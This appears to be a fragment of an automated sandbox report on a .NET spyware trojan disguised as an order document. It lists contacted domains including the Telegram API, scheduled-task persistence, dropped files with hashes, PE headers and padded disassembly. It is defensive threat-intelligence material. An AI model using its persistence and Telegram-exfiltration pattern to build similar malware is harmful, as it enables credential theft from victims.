                                                http://www.fontbureau.com/designers/cabarga.htmlORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.fontbureau.comtalikORDER (6256 OS)#391 PI.exe, 00000000.00000003.304149201.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fontbureau.comW.TTF0ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fontbureau.commBORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309765831.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349633653.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303319313.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303225948.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.comoORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304149201.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers8ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.fontbureau.comalsORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.comtop/ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304315545.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304286522.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304228747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304257902.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304393632.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://VEVgTqSNHWikc.orgWsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://api.telegram.orgORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.ipify.orgMozilla/5.0WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      149.154.167.220
                                                      api.telegram.orgUnited Kingdom
                                                      62041TELEGRAMRUfalse
                                                      54.91.59.199
                                                      unknownUnited States
                                                      14618AMAZON-AESUSfalse
                                                      3.232.242.170
                                                      api.ipify.org.herokudns.comUnited States
                                                      14618AMAZON-AESUSfalse
                                                      IP
                                                      192.168.2.1
                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                      Analysis ID:764027
                                                      Start date and time:2022-12-09 10:18:09 +01:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 8m 55s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:ORDER (6256 OS)#391 PI.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:14
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@14/5@6/4
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 95%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      TimeTypeDescription
                                                      10:19:10API Interceptor674x Sleep call for process: ORDER (6256 OS)#391 PI.exe modified
                                                      10:19:17Task SchedulerRun new task: WsdnBq path: C:\Users\user\AppData\Roaming\WsdnBq.exe
                                                      10:19:40API Interceptor428x Sleep call for process: WsdnBq.exe modified
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.355304211458859
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                      MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                      SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                      SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                      SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                      Process:C:\Users\user\AppData\Roaming\WsdnBq.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.355304211458859
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                      MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                      SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                      SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                      SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                      Process:C:\Users\user\AppData\Roaming\WsdnBq.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1639
                                                      Entropy (8bit):5.175860465839716
                                                      Encrypted:false
                                                      SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGyYtn:cbhK79lNQR/rydbz9I3YODOLNdq3u
                                                      MD5:0DBBF38DD1BB19DDB9D0C429955A1C4B
                                                      SHA1:09B7CD25F4FBF6BD3EB74FF25BDA85A71B99C87E
                                                      SHA-256:33B74500742DA6CCCF3FAB1A31DBD7953A5FB36C95EE25EF574839D96BB6D7C5
                                                      SHA-512:6AE4FE4F7D63F604014A27AD1A59A8E8013D21A562B3025E656C2C1A5BB6C6FE1551F1B7F88B746A7D4BEBABDC023C2880377BD6B8DA13B5EB7EF74D34145FC1
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                      Process:C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1639
                                                      Entropy (8bit):5.175860465839716
                                                      Encrypted:false
                                                      SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGyYtn:cbhK79lNQR/rydbz9I3YODOLNdq3u
                                                      MD5:0DBBF38DD1BB19DDB9D0C429955A1C4B
                                                      SHA1:09B7CD25F4FBF6BD3EB74FF25BDA85A71B99C87E
                                                      SHA-256:33B74500742DA6CCCF3FAB1A31DBD7953A5FB36C95EE25EF574839D96BB6D7C5
                                                      SHA-512:6AE4FE4F7D63F604014A27AD1A59A8E8013D21A562B3025E656C2C1A5BB6C6FE1551F1B7F88B746A7D4BEBABDC023C2880377BD6B8DA13B5EB7EF74D34145FC1
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                      Process:C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):873472
                                                      Entropy (8bit):7.665798175957009
                                                      Encrypted:false
                                                      SSDEEP:24576:F2ibxF1RKDbH8emeHmXlO3Qe5/uwg5+RAj:/xFqXHXmeOlO3QW/2e
                                                      MD5:19081EF2A08F678A3203B29124043C41
                                                      SHA1:E86ACEA06A600F170402A0C1020C25AC2550FFA0
                                                      SHA-256:2F356283C209400C6385A24450F266B59477E035E9389C8D1AF4843CD1AD2374
                                                      SHA-512:AAD284AE800F26F6D27A12EC66CD42C781861DE7FBD907B8C5B3938DC8FA343286B35E21A56C3680CC92E36D1857FB8F1FD53796F3A82BE182245493855FFA3F
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 31%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.c..............P..J...........h... ........@.. ....................................@.................................\h..O....................................+..T............................................ ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................h......H.......T...p............................................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*&..()....*...0..<........~.....(*.....,!r...p.....(+...o,...s-............~.....+..*.0...........~.....+..*".......*.0...........(....r-..p~....o.....+..*...0..<........~.....(*.....,!r=..p.....(+
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.665798175957009
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:ORDER (6256 OS)#391 PI.exe
                                                      File size:873472
                                                      MD5:19081ef2a08f678a3203b29124043c41
                                                      SHA1:e86acea06a600f170402a0c1020c25ac2550ffa0
                                                      SHA256:2f356283c209400c6385a24450f266b59477e035e9389c8d1af4843cd1ad2374
                                                      SHA512:aad284ae800f26f6d27a12ec66cd42c781861de7fbd907b8c5b3938dc8fa343286b35e21a56c3680cc92e36d1857fb8f1fd53796f3a82be182245493855ffa3f
                                                      SSDEEP:24576:F2ibxF1RKDbH8emeHmXlO3Qe5/uwg5+RAj:/xFqXHXmeOlO3QW/2e
                                                      TLSH:BC058BA773FB16E6C03492F4256063310EF1D62D89178731EF9458E89BA2A77C9E1732
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.c..............P..J...........h... ........@.. ....................................@................................
                                                      Icon Hash:00828e8e8686b000
                                                      Entrypoint:0x4d68ae
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x63914A88 [Thu Dec 8 02:23:04 2022 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xd685c0x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd80000x5b4.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xda0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xd2bd40x54.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xd48b40xd4a00False0.8199416244121105data7.6706447927786225IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
